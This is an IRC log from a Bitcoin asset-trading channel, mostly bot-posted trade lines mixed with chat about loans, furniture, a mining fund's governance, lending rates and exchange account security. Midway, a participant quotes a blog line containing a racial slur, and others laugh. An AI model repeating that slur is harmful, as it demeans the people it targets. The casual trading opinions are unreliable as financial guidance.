- Wikipedia, the free encyclopedia: ; Linda Caporael's Ergotism Article - Help: ; ergotism - definition of ergotism by the Free Online Dictionary ...: May 20 16:01:34 gogo TAT AM haha May 20 16:02:06 deadweasel: that's dreadful May 20 16:02:57 [BTCTC] [ASICMINER-PT] 1 @ 2.1748 BTC [-] May 20 16:03:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.021595 = 0.3023 BTC [+] May 20 16:03:14 [BTCTC] [TAT.ASICMINER] 78 @ 0.021595 = 1.6844 BTC [+] May 20 16:03:26 [BTCTC] [ASICMINER-PT] 1 @ 2.174998 BTC [+] May 20 16:04:46 yum! May 20 16:05:18 pay my loans or more into AM, these are my dilemmas May 20 16:06:26 [MPEX] [S.MPOE] 6114 @ 0.00067059 = 4.1 BTC [-] May 20 16:06:59 200% over 4 years, losing $90 (reduced gradually) on each monthly $140 payment. $4200 total May 20 16:08:17 furniture lol May 20 16:08:46 oh what I could use that 4k on today though :) May 20 16:08:59 [BTCTC] [S.DICE-PT] 3 @ 0.00279 = 0.0084 BTC [+] May 20 16:09:29 bed, tv, etc. so it's on my credit score but each $140 payment is helping credit anyway. May 20 16:10:13 huge plasma May 20 16:10:21 bed was 1.2k but damn its nice May 20 16:10:50 $300 bamboo sheets man <3 May 20 16:10:57 nah May 20 16:11:42 should have put this in btc haha but regardless.. losing $90 a month.. i can make more than that on the market May 20 16:12:57 lol you dont want to know what I did May 20 16:13:19 I sold it all and moved to japan, so ya i'm sittin on a shitty $25 chair May 20 16:13:28 in a $500 apartment May 20 16:13:40 you want an aeron May 20 16:13:59 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] May 20 16:14:33 oh i didn't get a lazy boy.. wannnt May 20 16:14:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.021595 = 0.1512 BTC [+] May 20 16:15:04 what would you do? pay it off? i'm still young enough to take risks and I have a stable career so I wont go bankrupt May 20 16:16:56 hmm yes May 20 16:19:50 ;;bugpowder May 20 16:19:50 Error: "bugpowder" is not a valid command. May 20 16:19:55 ;;seen bugpowder May 20 16:19:55 bugpowder was last seen in #bitcoin-assets 3 days, 13 hours, 29 minutes, and 2 seconds ago: taub asks are getting eaten May 20 16:21:47 that is nice. May 20 16:22:18 http://theselvedgeyard.files.wordpress.com/2009/03/eames-chair-herman-miller.jpg May 20 16:22:22 ^ that's what I want May 20 16:23:05 centipede looks like it was made with old skateboard decks. May 20 16:23:51 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [-] May 20 16:25:46 [MPEX] [S.MPOE] 3886 @ 0.00066941 = 2.6013 BTC [-] May 20 16:26:27 both comfy and sweaty. May 20 16:30:24 i just bought a leather sofa May 20 16:30:41 for my smoking room May 20 16:35:04 pics goat! May 20 16:35:25 but no ladybois 'smoking' anything. May 20 16:44:07 lol you all want pics? May 20 16:44:22 the sofa with a box of cubans? May 20 16:44:33 why? May 20 16:45:01 okay one sec lol May 20 16:47:57 okay i have 2 photos, where do i host them? May 20 16:48:36 one sec May 20 16:51:03 [BTCTC] [ASICMINER-PT] 1 @ 2.130001 BTC [+] May 20 16:51:12 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [-] May 20 16:52:42 http://tinypic.com/view.php?pic=2wqeadh&s=5 May 20 16:54:05 http://tinypic.com/view.php?pic=35jds47&s=5 pic number 2 May 20 16:54:21 you can see the btc in the lower left May 20 16:55:54 lol PBoy i only smoke cigars, not much weed. once every 6 months or so:) May 20 16:55:57 [HAVELOCK] [ASICM] 14 @ 0.0211 = 0.2954 BTC [+] May 20 16:58:19 [BTCTC] [ASICMINER-PT] 1 @ 2.122 BTC [-] May 20 16:58:22 Chaaang-Noi: looks comfy! May 20 16:58:25 [BTCTC] [ASICMINER-PT] 20 @ 2.121 = 42.42 BTC [-] May 20 16:59:00 [BTCTC] [ASICMINER-PT] 2 @ 2.121 = 4.242 BTC [-] May 20 17:01:13 [BTCTC] [ASICMINER-PT] 1 @ 2.173899 BTC [+] May 20 17:04:02 [HAVELOCK] [ASICM] 17 @ 0.02119999 = 0.3604 BTC [+] May 20 17:04:04 [HAVELOCK] [ASICM] 10 @ 0.02129 = 0.2129 BTC [+] May 20 17:04:05 [HAVELOCK] [ASICM] 73 @ 0.02145 = 1.5659 BTC [+] May 20 17:05:48 http://trilema.com/2013/valiant-prince-mp-explores-the-mother-of-all-echo-chambers-a-saga-of-our-times/ May 20 17:05:54 if anyone is looking for some cheap drama. May 20 17:06:02 [HAVELOCK] [ASICM] 100 @ 0.02144999 = 2.145 BTC [-] May 20 17:06:03 [HAVELOCK] [ASICM] 252 @ 0.02145 = 5.4054 BTC [+] May 20 17:06:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.021495 = 0.5374 BTC [-] May 20 17:06:44 [BTCTC] [ASICMINER-PT] 1 @ 2.1738 BTC [-] May 20 17:07:49 [BTCTC] [ASICMINER-PT] 1 @ 2.17385 BTC [+] May 20 17:08:21 [BTCTC] [ASICMINER-PT] 1 @ 2.173899 BTC [+] May 20 17:08:52 [BTCTC] [ASICMINER-PT] 3 @ 2.174 = 6.522 BTC [+] May 20 17:09:39 [BTCTC] [ASICMINER-PT] 1 @ 2.1738 BTC [-] May 20 17:09:54 [BTCTC] [ASICMINER-PT] 1 @ 2.17385 BTC [+] May 20 17:10:11 [BTCTC] [ASICMINER-PT] 1 @ 2.174 BTC [+] May 20 17:10:19 [10:08] now, I bought alot of asicminer shares May 20 17:10:19 [10:09] quite cheap it seems May 20 17:10:19 [10:09] arent they supposed to be 2BTC per share? May 20 17:10:35 [BTCTC] [PAJKA.BOND] 2 @ 0.1052 = 0.2104 BTC [-] May 20 17:10:39 [BTCTC] [PAJKA.BOND] 3 @ 0.1052 = 0.3156 BTC [-] May 20 17:11:44 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] May 20 17:11:57 [BTCTC] [ASICMINER-PT] 1 @ 2.174499 BTC [+] May 20 17:12:01 [BTCTC] [ASICMINER-PT] 1 @ 2.1745 BTC [+] May 20 17:12:07 [BTCTC] [ASICMINER-PT] 5 @ 2.17479 = 10.874 BTC [+] May 20 17:13:16 lol May 20 17:13:34 ah this is going to be so very much fun. May 20 17:15:28 Chaaang-Noi: looks comfy! it is thanks :) May 20 17:15:32 [BTCTC] [ASICMINER-PT] 2 @ 2.131 = 4.262 BTC [-] May 20 17:15:36 [BTCTC] [ASICMINER-PT] 1 @ 2.130001 BTC [-] May 20 17:15:42 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [-] May 20 17:15:50 [BTCTC] [ASICMINER-PT] 1 @ 2.126 BTC [-] May 20 17:16:06 [BTCTC] [ASICMINER-PT] 1 @ 2.125001 BTC [-] May 20 17:16:13 [BTCTC] [ASICMINER-PT] 1 @ 2.123 BTC [-] May 20 17:16:17 [BTCTC] [ASICMINER-PT] 1 @ 2.122 BTC [-] May 20 17:16:28 [BTCTC] [ASICMINER-PT] 1 @ 2.1212 BTC [-] May 20 17:16:57 [BTCTC] [ASICMINER-PT] 6 @ 2.121 = 12.726 BTC [-] May 20 17:19:07 [BTCTC] [ASICMINER-PT] 1 @ 2.121001 BTC [+] May 20 17:19:30 [BTCTC] [ASICMINER-PT] 2 @ 2.121 = 4.242 BTC [-] May 20 17:20:15 lmfao@ mp May 20 17:20:17 "Because you see, my dear fellows, not everyone on the Internet is the same. Not all black people are niggers," May 20 17:20:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.021495 = 1.0748 BTC [-] May 20 17:20:30 if you say so May 20 17:20:45 [BTCTC] [ASICMINER-PT] 2 @ 2.15 = 4.3 BTC [+] May 20 17:20:49 from here http://trilema.com/2013/internet-story/ May 20 17:20:50 lulz May 20 17:21:02 [HAVELOCK] [ASICM] 12 @ 0.02145 = 0.2574 BTC [+] May 20 17:22:28 [BTCTC] [COGNITIVE] 1 @ 0.259704 BTC [+] May 20 17:22:32 fiat500 :p May 20 17:22:34 [BTCTC] [ASICMINER-PT] 1 @ 2.149999 BTC [-] May 20 17:22:38 [BTCTC] [TAT.ASICMINER] 140 @ 0.02133 = 2.9862 BTC [-] May 20 17:23:03 [HAVELOCK] [ASICM] 5 @ 0.02145 = 0.1073 BTC [+] May 20 17:23:37 cog has gone up a bit May 20 17:25:04 Chaaang-Noi: i took the plunge and bought 30btc worth of cog.f :P May 20 17:25:15 time to sell May 20 17:25:17 [BTCTC] [GSDPT] 50 @ 0.00273 = 0.1365 BTC [-] May 20 17:25:24 [BTCTC] [ASICMINER-PT] 1 @ 2.149999 BTC [-] May 20 17:25:38 hope it does well May 20 17:25:50 [BTCTC] [ASICMINER-PT] 1 @ 2.125001 BTC [-] May 20 17:25:53 [BTCTC] [ASICMINER-PT] 1 @ 2.125 BTC [-] May 20 17:26:03 [BTCTC] [ASICMINER-PT] 3 @ 2.15 = 6.45 BTC [+] May 20 17:26:04 [HAVELOCK] [ASICM] 9 @ 0.02145 = 0.1931 BTC [+] May 20 17:26:19 should be interesting May 20 17:26:21 [BTCTC] [S.DICE-PT] 25 @ 0.00279 = 0.0698 BTC [+] May 20 17:26:57 many people want a time machine to go back in time, at present, i would like a time machine to send me forward a few months May 20 17:27:49 thats a dark way of looking at it May 20 17:28:07 [BTCTC] [BITVPS] 28 @ 0.000696 = 0.0195 BTC [-] May 20 17:29:50 anyone know whats up with bitvps, these guys cant turn a profit it seems, lol May 20 17:31:32 never liked the business modle May 20 17:31:34 model May 20 17:32:04 they got raped by ghost May 20 17:32:14 lol May 20 17:32:23 dwindling sales since feb May 20 17:32:25 [10:27] putting urself closer to death.. < not true May 20 17:32:30 [BTCTC] [TAT.ASICMINER] 18 @ 0.02133 = 0.3839 BTC [-] May 20 17:32:38 time machine is to travel time, not fast forward it May 20 17:32:46 :P May 20 17:32:50 really sad tbh, i wanna see more internet services built on btc May 20 17:33:04 ThickAsThieves: indeed May 20 17:33:54 they dont affect us May 20 17:33:56 this is a fact May 20 17:34:02 them not existing n all May 20 17:34:19 Chaaang-Noi: i think maybe COG.F shareholders deserve a say in how their money is spent May 20 17:34:43 cant beat my time machine May 20 17:34:55 rather than leave it to the unwashed masses in COGNITIVE whose interests are a quick payoff May 20 17:34:58 lol it's not their money... where do you have the notion from? May 20 17:35:42 jurov: humor me, whose is it then? May 20 17:36:03 [MPEX] [S.MPOE] 18983 @ 0.00067097 = 12.737 BTC [+] May 20 17:36:14 those who have teh private key? May 20 17:36:33 O_o May 20 17:36:53 what point are you trying to make May 20 17:36:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.021011 = 0.2101 BTC [-] May 20 17:37:30 [10:34] lol it's not their money May 20 17:37:35 he made his point already May 20 17:37:40 https://btct.co/security/COGNITIVE says nothing about ownership, just about participation and distribution of mining revenue May 20 17:38:03 [HAVELOCK] [ASICM] 113 @ 0.02145 = 2.4239 BTC [+] May 20 17:38:03 jurov: i am talking about COG.F May 20 17:38:22 link? May 20 17:39:05 https://bitcointalk.org/index.php?topic=67547.msg1608775#msg1608775 May 20 17:40:02 fund designed for purchase of new hardware, but funnily enough with no voting power (COGNITIVE shareholders get to decide how it is spent) May 20 17:41:05 decisions are best made by committee after all... May 20 17:41:25 okay to me it looks like a loan. and borrower thus owns the coins, with purported obligation to fullfill some conditions later May 20 17:41:58 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1999 = 0.5997 BTC [-] May 20 17:43:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.021329 = 0.0853 BTC [+] May 20 17:43:57 whole thing says plenty how poorly bitcoin assets work. garrett cannot accept promises from prospective shareholders that they will have the coins May 20 17:44:08 "when the opportunity becomes available (Whether it be Avlalon, BFL, or other)" May 20 17:44:11 im not talking about obligations here, im saying it is weird that holders of COGNITIVE, whose interests are a quick payoff, get to decide how the money provided by COG.F investors is spent May 20 17:44:22 he has actually to take the coins and do the escrow himself May 20 17:45:08 yeah May 20 17:45:31 the price we pay for lack of regulation? May 20 17:45:49 anyway im not too bothered by it, just thinking out loud May 20 17:48:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.021329 = 0.128 BTC [+] May 20 17:56:14 [BTCTC] [ASICMINER-PT] 1 @ 2.149496 BTC [-] May 20 17:56:40 okay to me it looks like a loan. and borrower thus owns the coins, with purported obligation to fullfill some conditions later << methinks j man has been doing a lot of reading up lately. May 20 17:57:39 nah im just pretending May 20 17:57:59 hehe. it is a good thing. and you are exactly correct, by thwe way, it's a point few people understand May 20 17:58:23 that's why it's not legally surprising a bank takes its depositor funds. they are unsecured creditors. the bank is the owner of all funds deposited by anyone. May 20 17:58:26 [BTCTC] [ASICMINER-PT] 1 @ 2.149497 BTC [+] May 20 17:58:30 [BTCTC] [ASICMINER-PT] 6 @ 2.149989 = 12.8999 BTC [+] May 20 17:58:33 [BTCTC] [ASICMINER-PT] 15 @ 2.14999 = 32.2499 BTC [+] May 20 17:59:12 [BTCTC] [ASICMINER-PT] 21 @ 2.15 = 45.15 BTC [+] May 20 17:59:24 [MPEX] [S.MPOE] 21147 @ 0.00067089 = 14.1873 BTC [-] May 20 17:59:31 [BTCTC] [ASICMINER-PT] 20 @ 2.15 = 43 BTC [+] May 20 18:07:06 [BTCTC] [ASICMINER-PT] 1 @ 2.150001 BTC [+] May 20 18:07:10 [BTCTC] [ASICMINER-PT] 6 @ 2.15 = 12.9 BTC [-] May 20 18:07:52 bots >_> May 20 18:08:24 those were bids i think May 20 18:08:27 what would you say is a fair rate for lending btc short? May 20 18:08:31 people getting aggressive with the buying May 20 18:08:45 someone bought 90 @ 2.2 on BF last night May 20 18:09:50 b0n1 not quite enough market data yet to answer that q. May 20 18:09:56 whatever you can get away with i guess. May 20 18:10:16 b0n1: going rate on bfx is 0.02%/day May 20 18:10:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.021495 BTC [+] May 20 18:10:44 fiat500, yeah i saw that, but that does look extremely low in my oppinion May 20 18:11:07 also pretty meaningless. May 20 18:11:15 i dont think anyone could read furuknap's analysis without their eyes crossing and moving on May 20 18:11:28 ThickAsThieves: LOL May 20 18:11:40 yeah May 20 18:12:18 he made it too tense. otherwise he does have a point. May 20 18:12:47 [MPEX] [S.MPOE] 15700 @ 0.00066815 = 10.49 BTC [-] May 20 18:12:52 [MPEX] [S.MPOE] 2450 @ 0.00066751 = 1.6354 BTC [-] May 20 18:13:22 b0n1: point is if you try to charge more, you wont find borrowers May 20 18:13:34 not that its a fair value May 20 18:13:52 as far as i know tho, it's the borrowers who come to the terms of the lender May 20 18:13:55 not the other way around May 20 18:13:59 nobody is desperate to lend out btc. May 20 18:14:19 i want a BTC credit line May 20 18:14:50 heh, on bfx they are quite desperate May 20 18:14:57 get in mpex, trade a lot, they're not hard to get. May 20 18:15:06 variable interest rate nets >70% p.a May 20 18:15:23 fiat500 except they don't make it a full year. May 20 18:15:28 but in mpex i'd have to trade mpoe back and forth all day May 20 18:15:37 mircea_popescu: right, but thats still pretty high May 20 18:15:44 afaik this was discussed in the forum fiat500. the blowout rate was like 30%, making any interest under 5k pa or so a losing proposition. May 20 18:16:03 ThickAsThieves you know most pro traders irl trade one asset class. May 20 18:16:05 and jurov already ahs that market cornered May 20 18:16:11 i borrowed $20k on margin for a long position a few days ago, made $1700 but also had to pay $200 swap May 20 18:16:22 might explain why actual ws types aren't as worried about it as the forum variety seekrs. May 20 18:16:24 so its a non-negligible amount of money May 20 18:16:51 (over 3-4 days) May 20 18:16:55 anyway, off to teh dungeons. take care all. May 20 18:17:09 i could probly just start a find May 20 18:17:11 fund May 20 18:17:15 or issue bonds May 20 18:17:19 and get btc much cheaper May 20 18:17:22 like namworld? May 20 18:17:26 yep May 20 18:17:29 ive considered it May 20 18:20:06 and jurov already ahs that market cornered <<< haha i'm rly so scary? May 20 18:21:04 [HAVELOCK] [ASICM] 1 @ 0.02145 BTC [+] May 20 18:21:26 nah, i just HATE bots May 20 18:21:40 you can have your MPOE racket May 20 18:21:42 :) May 20 18:22:03 [HAVELOCK] [ASICM] 335 @ 0.02145 = 7.1858 BTC [+] May 20 18:22:05 [HAVELOCK] [ASICM] 9 @ 0.02145119 = 0.1931 BTC [+] May 20 18:22:06 [HAVELOCK] [ASICM] 106 @ 0.0214512 = 2.2738 BTC [+] May 20 18:22:25 eat, eat, who ever heard of a skinny santa? May 20 18:23:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.021495 BTC [+] May 20 18:23:53 lol May 20 18:25:24 http://www.hark.com/clips/lsbvcbjlcv-skinny-santa May 20 18:29:36 [BTCTC] [TAT.ASICMINER] 18 @ 0.021495 = 0.3869 BTC [+] May 20 18:42:02 [HAVELOCK] [ASICM] 170 @ 0.0214512 = 3.6467 BTC [+] May 20 18:45:02 [HAVELOCK] [ASICM] 3 @ 0.0214512 = 0.0644 BTC [+] May 20 18:45:55 [BTCTC] [ASICMINER-PT] 1 @ 2.168899 BTC [+] May 20 18:47:47 [BTCTC] [ASICMINER-PT] 1 @ 2.1689 BTC [+] May 20 18:48:58 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] May 20 18:57:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.021512 = 0.086 BTC [+] May 20 18:58:55 we are all food, we are all meant to be eaten. May 20 18:59:06 [BTCTC] [ASICMINER-PT] 2 @ 2.168 = 4.336 BTC [+] May 20 18:59:14 [BTCTC] [ASICMINER-PT] 1 @ 2.1689 BTC [+] May 20 18:59:20 for every 1 human cell there are 10 non-human cells in our bodies. May 20 18:59:20 [BTCTC] [ASICMINER-PT] 1 @ 2.169 BTC [+] May 20 18:59:26 [BTCTC] [ASICMINER-PT] 3 @ 2.178 = 6.534 BTC [+] May 20 18:59:27 microbes May 20 18:59:33 [BTCTC] [ASICMINER-PT] 1 @ 2.178 BTC [+] May 20 18:59:40 [BTCTC] [ASICMINER-PT] 2 @ 2.17998 = 4.36 BTC [+] May 20 19:00:04 [HAVELOCK] [ASICM] 1 @ 0.02120002 BTC [-] May 20 19:01:29 [11:58] we are all food, we are all meant to be eaten. < that might be debatable May 20 19:01:31 [BTCTC] [ASICMINER-PT] 1 @ 2.1798 BTC [-] May 20 19:01:43 we have adapted to eat things May 20 19:01:46 not to be eaten May 20 19:02:03 [HAVELOCK] [ASICM] 6 @ 0.02120002 = 0.1272 BTC [-] May 20 19:02:04 [HAVELOCK] [ASICM] 100 @ 0.02144 = 2.144 BTC [+] May 20 19:02:06 [HAVELOCK] [ASICM] 94 @ 0.02145 = 2.0163 BTC [+] May 20 19:02:18 ThickAsThieves: when you die you will be eaten, unless cremated or taxidermied May 20 19:02:32 [BTCTC] [ASICMINER-PT] 1 @ 2.1798 BTC [-] May 20 19:02:33 things have adapted to eat us, too. May 20 19:02:43 they are just smaller than use. May 20 19:02:59 use/us May 20 19:03:03 nonetheless, we arent made to be eaten May 20 19:03:17 unless you wanna get really abstract May 20 19:03:30 and say we are meant to be eaten by the universe itself May 20 19:03:45 i do. :) May 20 19:03:47 hehe May 20 19:04:05 btw do you watch that Hannibal show? May 20 19:04:06 [BTCTC] [BTC-TRADING-PT] 2 @ 0.2611 = 0.5222 BTC [+] May 20 19:04:09 pretty good stuff May 20 19:04:29 no, not yet, I downloaded the first few, but GF was frightened so didn't get through 5 minutes of first one. May 20 19:04:45 yeah it's pretty gruesome for tv May 20 19:04:53 like Se7en May 20 19:04:59 maybe worse May 20 19:05:18 that whole movie was unnecessary, i think I'll skip Hannibal unless I'm very bored. May 20 19:05:46 borgias and game of thrones are filled the ARCHER void for me right now. May 20 19:05:52 filled/filling May 20 19:06:13 if I could watch new episodes of archer for the rest of my life I'd seriously consider it. May 20 19:06:50 [BTCTC] [ASICMINER-PT] 1 @ 2.158 BTC [-] May 20 19:07:07 i couldnt get into Borgias May 20 19:07:19 nor Archer May 20 19:07:33 it's not worth it, all drama, not enough historical action or battlefield action May 20 19:07:38 borgias is not. May 20 19:07:39 GoT is good, but best watched in binge mode May 20 19:07:49 archer is the mutherloving best show I've ever seen. May 20 19:07:56 takes a certain type of humor though. May 20 19:07:57 [BTCTC] [S.DICE-PT] 10 @ 0.00279 = 0.0279 BTC [+] May 20 19:08:05 my type. May 20 19:08:59 yeah ThickAsThieves, people smarter than I are waiting for all the seasons to finished and then do the 5 day marathon vacation with the box set. May 20 19:09:05 which I wish I'd done. May 20 19:09:22 that way the smaller subplots hook better and you're more interested in the drama. May 20 19:10:25 yeah I always feel like I need like 30 more min per ep May 20 19:10:35 too many plots May 20 19:11:19 so CISPA is not dead: http://cms.fightforthefuture.org/cispa-not-dead/ May 20 19:11:25 i forget, you in the states ThickAsThieves ? May 20 19:11:29 yes May 20 19:12:02 [HAVELOCK] [ASICM] 100 @ 0.02144 = 2.144 BTC [-] May 20 19:12:04 [HAVELOCK] [ASICM] 6 @ 0.02145 = 0.1287 BTC [+] May 20 19:12:26 [BTCTC] [ASICMINER-PT] 1 @ 2.16 BTC [+] May 20 19:13:11 then pls help kill CISPA round two. :) May 20 19:17:03 [HAVELOCK] [ASICM] 100 @ 0.02144999 = 2.145 BTC [-] May 20 19:17:04 [HAVELOCK] [ASICM] 100 @ 0.02145 = 2.145 BTC [+] May 20 19:17:29 i did May 20 19:17:31 and i shared May 20 19:17:33 thx May 20 19:19:36 [BTCTC] [ASICMINER-PT] 2 @ 2.168 = 4.336 BTC [+] May 20 19:25:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.021595 BTC [+] May 20 19:26:46 [BTCTC] [ASICMINER-PT] 1 @ 2.168 BTC [+] May 20 19:28:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.021011 = 0.2101 BTC [-] May 20 19:29:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.021011 BTC [-] May 20 19:29:03 [HAVELOCK] [ASICM] 100 @ 0.02146 = 2.146 BTC [+] May 20 19:29:36 [BTCTC] [S.MPOE-PT] 10 @ 0.000646 = 0.0065 BTC [-] May 20 19:30:15 dump it all May 20 19:30:22 [BTCTC] [B.YABMC] 10 @ 0.015 = 0.15 BTC [-] May 20 19:30:26 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] May 20 19:30:33 [BTCTC] [ASICMINER-PT] 1 @ 2.1798 BTC [+] May 20 19:32:04 [HAVELOCK] [ASICM] 65 @ 0.02146 = 1.3949 BTC [+] May 20 19:33:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.021011 BTC [-] May 20 19:34:19 [BTCTC] [TAT.ASICMINER] 23 @ 0.021011 = 0.4833 BTC [-] May 20 19:35:17 [BTCTC] [ASICMINER-PT] 2 @ 2.179 = 4.358 BTC [-] May 20 19:36:10 [BTCTC] [TAT.ASICMINER] 32 @ 0.021011 = 0.6724 BTC [-] May 20 19:39:04 [HAVELOCK] [ASICM] 34 @ 0.02148899 = 0.7306 BTC [+] May 20 19:40:03 [HAVELOCK] [SDICE] 1 @ 0.239 BTC [-] May 20 19:42:11 o my May 20 19:43:42 [BTCTC] [ASICMINER-PT] 5 @ 1.6 = 8 BTC [-] May 20 19:44:03 [HAVELOCK] [ASICM] 3 @ 0.02148899 = 0.0645 BTC [+] May 20 19:46:07 [BTCTC] [ASICMINER-PT] 1 @ 2.179 BTC [+] May 20 19:46:13 [BTCTC] [ASICMINER-PT] 1 @ 2.17998 BTC [+] May 20 19:46:16 [BTCTC] [ASICMINER-PT] 3 @ 2.179999 = 6.54 BTC [+] May 20 19:46:50 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [+] May 20 19:47:32 [BTCTC] [ASICMINER-PT] 5 @ 2.18 = 10.9 BTC [+] May 20 19:48:29 [BTCTC] [ASICMINER-PT] 4 @ 1.6 = 6.4 BTC [-] May 20 19:48:50 [MPEX] [S.MPOE] 6427 @ 0.00067053 = 4.3095 BTC [+] May 20 19:49:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.021011 = 0.2101 BTC [-] May 20 19:49:08 [BTCTC] [ASICMINER-PT] 4 @ 1.6 = 6.4 BTC [-] May 20 19:50:33 o no. May 20 19:50:34 [BTCTC] [TAT.ASICMINER] 75 @ 0.021011 = 1.5758 BTC [-] May 20 19:50:37 1.6 so soon ? May 20 19:50:44 ;;seen mjr___ May 20 19:50:44 mjr___ was last seen in #bitcoin-assets 2 weeks, 0 days, 9 hours, 14 minutes, and 52 seconds ago: talk to you later, and i'll let you know how it goes in union square May 20 19:50:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.021011 = 0.4202 BTC [-] May 20 19:50:51 was an option May 20 19:50:53 oh come on, don't pretend you don't know those are my options :) May 20 19:51:04 i'm not pretending May 20 19:51:15 well, you fooled me then May 20 19:51:18 and why are options trading in the underlying or wtf nonsense have you kids cooked up this time ? May 20 19:51:35 it's a stupid setup the way options are reported May 20 19:51:48 mkay. May 20 19:51:55 on the other hand, it's great for poking fun at May 20 19:52:03 ;;seen mjr_ May 20 19:52:03 mjr_ was last seen in #bitcoin-assets 4 days, 22 hours, 11 minutes, and 49 seconds ago: hey Bugpowda May 20 19:53:03 it's probably a pita to code it just so gribble sees options differently May 20 19:53:04 [HAVELOCK] [HIM] 1 @ 1.7 BTC [+] May 20 19:53:15 mpex doesnt even show option excercises May 20 19:53:19 might be a better approach May 20 19:53:29 [BTCTC] [TAT.ASICMINER] 33 @ 0.021011 = 0.6934 BTC [-] May 20 19:53:41 why don't options get their own mpsics like in NORMAL SANE PEOPLE LAND May 20 19:53:43 wtf. May 20 19:53:45 selling all the things today May 20 19:53:45 ;;later tell mjr_ #BTCPro is discussing buttonwood and your blog write up of it, they like it. May 20 19:53:45 The operation succeeded. May 20 19:53:56 btct.co exit May 20 19:54:17 buy all the cheap things May 20 19:54:18 [BTCTC] [ASICMINER-PT] 1 @ 2.188 BTC [+] May 20 19:56:12 what cheap things are you buying? May 20 19:56:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.021594 = 0.108 BTC [+] May 20 19:56:36 [BTCTC] [S.MPOE-PT] 2 @ 0.000646 = 0.0013 BTC [-] May 20 19:56:39 don't worry, I'm all cash except cold storage, i won't steal your cheap things May 20 20:02:10 [BTCTC] [BASIC-MINING] 4 @ 0.5 = 2 BTC [+] May 20 20:02:32 do you leave your BTC on your gox acc? how do you estimate the risk? May 20 20:03:49 [BTCTC] [ASICMINER-PT] 2 @ 2.188 = 4.376 BTC [+] May 20 20:03:53 [BTCTC] [ASICMINER-PT] 2 @ 2.188 = 4.376 BTC [+] May 20 20:04:10 b0n1 coins you can lose May 20 20:04:34 [BTCTC] [ASICMINER-PT] 6 @ 2.188 = 13.128 BTC [+] May 20 20:04:40 can't you lose usd also? thieves can just buy coins with your usd and transfer out May 20 20:04:45 [BTCTC] [ASICMINER-PT] 5 @ 1.6 = 8 BTC [-] May 20 20:05:12 saulimus: coins are way easier to steal and spend again, electronic funds can be reversed May 20 20:05:28 but you're right May 20 20:05:30 [BTCTC] [ASICMINER-PT] 3 @ 1.6 = 4.8 BTC [-] May 20 20:05:38 if they had trade access and withdraw access, they could May 20 20:06:00 but you'd have to have really lax security measure for that to happen. May 20 20:06:04 [HAVELOCK] [ASICM] 63 @ 0.02148899 = 1.3538 BTC [+] May 20 20:06:09 [BTCTC] [ASICMINER-PT] 3 @ 1.6 = 4.8 BTC [-] May 20 20:06:12 I only use info and trade on my api keys May 20 20:06:38 I read on reddit some cases where 2fa was on but they still stole everything May 20 20:09:10 if your account password gets hacked, both fiat and btc can be stolen easily like May 20 20:09:49 i think this one way password makes things much safer May 20 20:10:03 but does it work for you? May 20 20:10:51 i have yubikey May 20 20:10:58 and im not in sauna May 20 20:11:04 [HAVELOCK] [ASICM] 4 @ 0.02149 = 0.086 BTC [+] May 20 20:11:28 AM is solomining now May 20 20:11:32 signing blocks May 20 20:11:35 about time May 20 20:11:37 [BTCTC] [ASICMINER-PT] 2 @ 2.189 = 4.378 BTC [+] May 20 20:11:38 https://blockchain.info/tx/cba743ea1b7904c5624e0ee75f12d177ceb214c07f8e8b55ff2eb082404eb54a?show_adv=true May 20 20:12:05 tx in ROmania hehe May 20 20:12:18 supernodes concentration May 20 20:13:02 check out the wallet that received the reward May 20 20:13:02 [BTCTC] [ASICMINER-PT] 2 @ 2.198 = 4.396 BTC [+] May 20 20:13:03 https://blockchain.info/address/1HtUGfbDcMzTeHWx2Dbgnhc6kYnj1Hp24i May 20 20:15:04 [HAVELOCK] [ASICM] 3 @ 0.02149 = 0.0645 BTC [+] May 20 20:16:03 [HAVELOCK] [ASICM] 525 @ 0.02149 = 11.2823 BTC [+] May 20 20:18:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.021592 = 0.108 BTC [-] May 20 20:20:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.021593 = 0.2159 BTC [+] May 20 20:21:03 [HAVELOCK] [ASICM] 65 @ 0.02149 = 1.3969 BTC [+] May 20 20:25:09 gee look at all thos 30 btcs May 20 20:27:26 anyone selling ripple? May 20 20:28:19 I'll sell at 10x market price May 20 20:29:13 deadweasel i'm exiting May 20 20:29:14 ThickAsThieves: is there any way to find other blocks that were mined by them May 20 20:29:23 all the securities May 20 20:29:38 inhies thats the first one May 20 20:29:43 not sure otherwise May 20 20:29:55 time to go. you guys have fun. i'm getting that glbse feeling May 20 20:30:06 ? May 20 20:30:09 care to elaborate May 20 20:30:13 or just paranoia May 20 20:30:24 right before glbse closed i felt like i should've sold everything May 20 20:30:32 that feeling is back May 20 20:30:50 thanks for TAT.ASICMINER May 20 20:30:53 that was fun May 20 20:31:09 jcpham: sell me your shares 4 cheap plz May 20 20:31:10 thx May 20 20:31:15 well shoot May 20 20:31:19 all gone May 20 20:31:34 so you have nothing but spider sense? May 20 20:31:37 or do you know somehting May 20 20:31:42 true story May 20 20:31:46 all smoke and mirrors May 20 20:32:00 huh? May 20 20:32:07 paranoia and nothing else. May 